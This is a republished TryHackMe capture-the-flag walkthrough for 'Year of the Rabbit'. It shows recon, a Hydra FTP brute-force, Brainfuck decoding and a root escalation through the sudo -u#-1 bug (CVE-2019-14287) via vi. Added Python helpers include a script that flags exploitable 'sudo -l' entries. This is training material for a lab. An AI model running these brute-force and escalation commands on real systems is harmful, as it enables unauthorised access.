Hacking, Misconfigured permissions, Sudo, Cipher
TryHackMe — Year of the Rabbit Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
Let’s start things off with a network scan to see which ports are open and the services running on each.
$ nmap -A -O -sC -sV -p- <machine_IP>
Scanning for directories with Gobuster:
Contents of /assets directory:
Contents of /css directory:
When visiting /sup3r_s3cret_fl4g.php
Okay, I’ll use the devtools to inspect this page.
That shows that the script makes the video from /assets start playing on YouTube.
Now, navigating to the Network tab in devtools, I see the next place I need to look at.
When viewing that directory there’s an image file. There might be some steganography to do.
I tried using a few tools on the image file; testing for steganography and also using tools like exiftool, binwalk, and strings.
When I used strings, I found the username for the FTP server!
The list of possible passwords went on for a while, so I turned them into a wordlist and fired up Hydra to brute-force the FTP server.
$ hydra -l ftpuser -P <password-file> <machine_IP> ftp
After logging in to the FTP server I found a text file.
I downloaded that file and viewed the contents.
At least they’re not plaintext. Although, they are part of a cipher that’s somewhat common.
If you like to do CTFs I’m sure you know what this is.
If you don’t, it’s called Brainfuck.
“Brainfuck (or BF or Brainf**k) is a minimalist programming language that uses only eight commands to manipulate memory and perform operations.
It takes its name from two words brain and fuck, that refer to a kind of major frustration for your brain (or cerebral masturbation).”
Initial foothold:
To decode this, I went to dcode[.]fr
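dcode.fr did the job here, but an offline interpreter is only a few dozen lines and avoids pasting loot from a target into a third-party site. The Python below is an added example and not code from the original post: a Brainfuck interpreter with 8-bit wrapping cells, a precomputed jump table for nested loops, and a step limit so a runaway program cannot hang the shell. The program it runs is constructed for the demo (it prints `Hi`) and is not the file taken from the FTP server; paste the real contents into `run_bf()` to decode them.

```python
# Added example: minimal Brainfuck interpreter for decoding CTF loot offline.
# Not part of the original walkthrough; SAMPLE_PROGRAM is constructed, not the real file.


def _match_brackets(code):
    """Precompute jump targets so nested loops are O(1) to follow; reject unbalanced code."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at offset %d" % i)
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at offset %d" % stack[-1])
    return jumps


def run_bf(code, input_bytes=b"", tape_size=30000, max_steps=10_000_000):
    """Execute Brainfuck `code` and return its output as a str (latin-1, one char per byte)."""
    code = "".join(ch for ch in code if ch in "+-<>[].,")  # anything else is a comment
    jumps = _match_brackets(code)
    tape = bytearray(tape_size)  # cells are unsigned 8-bit, zero-initialised
    ptr = pc = inp = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (runaway loop?)")
        ch = code[pc]
        if ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF  # wrap around like a real 8-bit cell
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            # Read one byte of input; EOF stores 0 (one of the common conventions)
            tape[ptr] = input_bytes[inp] if inp < len(input_bytes) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '['
        pc += 1
    return out.decode("latin-1")


# Constructed demo program (not the file from the target): prints "Hi".
SAMPLE_PROGRAM = (
    "++++++++"              # cell0 = 8 (loop counter)
    "[>+++++++++<-]"        # cell1 += 9 per iteration -> 72
    ">."                    # output cell1: 72 = 'H'
    + "+" * 33 + "."        # 72 + 33 = 105 = 'i'
)

if __name__ == "__main__":
    print(run_bf(SAMPLE_PROGRAM))
```

The comment-stripping step matters for pasted loot: copied text often carries stray whitespace or line wrapping, and Brainfuck ignores every character outside its eight commands, so nothing needs cleaning up first.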
Now I can SSH into the machine!
Upon logging in I’m greeted with a message.
If there’s a message for another user I wonder how many other users there are, time to find out.
$ grep "bash" /etc/passwd
Okay, a secret hiding place; it can’t be in the directory from earlier. I used find to see if I could locate a file with that name, but that didn’t turn up anything.
Next, I tried looking for a directory named s3cr3t instead of a file. Bingo!
$ find / -type d -iname "s3cr3t" 2>/dev/null
From there I found the note!
Lateral pivoting:
And the contents of the text file are:
Now, as the user Gwendoline, I can grab the user flag.
Since I have the user’s password, I can check what I’m allowed to run with sudo.
$ sudo -l
Hmm, I can run that as any other user except root.
Exploit:
I tried looking for other ways to get privilege escalation and finally had to resort to uploading a copy of linpeas to the target machine and firing it off.
Visiting the link took me to a page that showed a quick command for how to exploit that version of sudo.
Privilege escalation:
Great, now that I know how to exploit sudo it’s time to escalate my privileges.
$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Then, when vi opens the file, the command is:
:!/bin/bash
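The sudoers entry lets Gwendoline run vi as any user but root, and the reason `-u#-1` still lands in a root shell is the sudo bug commonly tracked as CVE-2019-14287, fixed in sudo 1.8.28: a numeric user id of -1 was stored as the unsigned value 4294967295, which matched neither the `!root` exclusion nor uid 0, and setresuid() treats (uid_t)-1 as "leave unchanged", so the already-root sudo process simply kept uid 0. The Python below is an added example, not code from the walkthrough or from sudo: it parses a constructed `sudo -l` listing (the hostname and entry are made up for the demo), flags Runas specs of the `(ALL, !root)` shape, compares the sudo version against 1.8.28, and models the old and fixed uid resolution. The uid model is a deliberate simplification of sudo's internals, not a reimplementation.

```python
# Added example: triage a `sudo -l` listing for the (ALL, !root) + old-sudo combination.
# Not from the original post or from sudo itself; sample output below is constructed.
import re

SUDO_FIXED = (1, 8, 28)   # first sudo release that rejects uid -1 / 4294967295
UID_MAX = 0xFFFFFFFF      # uid_t is a 32-bit unsigned integer on Linux

# Constructed `sudo -l` output; hostname "target" and the entry are illustrative only.
SAMPLE_SUDO_L = """\
Matching Defaults entries for gwendoline on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gwendoline may run the following commands on target:
    (ALL, !root) /usr/bin/vi /home/gwendoline/user.txt
"""

# "(Runas) [TAG:...] command" lines; tags such as NOPASSWD: are skipped over.
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:[A-Z]+:\s*)*(.+?)\s*$")


def parse_sudo_l(output):
    """Return (runas_spec, command) pairs from `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1).strip(), m.group(2)))
    return entries


def runas_users(spec):
    """User part of a Runas spec: 'ALL, !root' -> ['ALL', '!root'] ('ALL : ALL' keeps only users)."""
    user_part = spec.split(":")[0]
    return [u.strip() for u in user_part.split(",") if u.strip()]


def allows_everyone_but_root(spec):
    """True for the (ALL, !root) shape that the -u#-1 trick targets."""
    users = runas_users(spec)
    return "ALL" in users and any(u in ("!root", "!#0") for u in users)


def legacy_resolve_uid(arg):
    """Model of pre-1.8.28 handling of `-u#<n>`: parsed as signed, stored as uid_t."""
    if not arg.startswith("#"):
        raise ValueError("only numeric '#uid' specs are modelled here")
    return int(arg[1:]) & UID_MAX   # -1 wraps to 4294967295


def legacy_passes_not_root_check(arg):
    """The '!root' exclusion compares against uid 0; 4294967295 is not 0, so it slips through."""
    return legacy_resolve_uid(arg) != 0


def legacy_effective_uid(arg, current_uid=0):
    """setresuid() treats (uid_t)-1 as 'no change'; sudo runs as root, so uid 0 survives."""
    uid = legacy_resolve_uid(arg)
    return current_uid if uid == UID_MAX else uid


def fixed_resolve_uid(arg):
    """Post-1.8.28 behaviour: -1 and 4294967295 are rejected instead of being passed on."""
    if not arg.startswith("#"):
        raise ValueError("only numeric '#uid' specs are modelled here")
    uid = int(arg[1:])
    if uid < 0 or uid >= UID_MAX:
        raise ValueError("invalid user id: %d" % uid)
    return uid


def parse_sudo_version(text):
    """'Sudo version 1.8.27p1' -> (1, 8, 27); the patch-level suffix is ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised sudo version: %r" % text)
    return tuple(int(x) for x in m.groups())


def version_is_affected(text):
    return parse_sudo_version(text) < SUDO_FIXED


def exploitable_commands(sudo_l_output, sudo_version):
    """Commands runnable as root via -u#-1: old sudo plus an (ALL, !root) Runas spec."""
    if not version_is_affected(sudo_version):
        return []
    return [cmd for spec, cmd in parse_sudo_l(sudo_l_output) if allows_everyone_but_root(spec)]


if __name__ == "__main__":
    for cmd in exploitable_commands(SAMPLE_SUDO_L, "Sudo version 1.8.27"):
        print("candidate for sudo -u#-1:", cmd)
```

On a real host, feed the output of `sudo -l` and `sudo --version` to `exploitable_commands()`; an empty list means either sudo is already at 1.8.28 or later or no entry has the `(ALL, !root)` shape, and in both cases `-u#-1` is not the route.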
With the root shell it’s now time to grab that root flag!
Reporting:
- Make sure to remove files from the web server that have sensitive information or are not in use anymore.
- Ensure correct permissions are set for users/groups, and that access to files/binaries on the system is checked regularly.
- Keep all software, hardware and systems up to date with security patches/version updates to prevent vulnerabilities on older versions.
Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.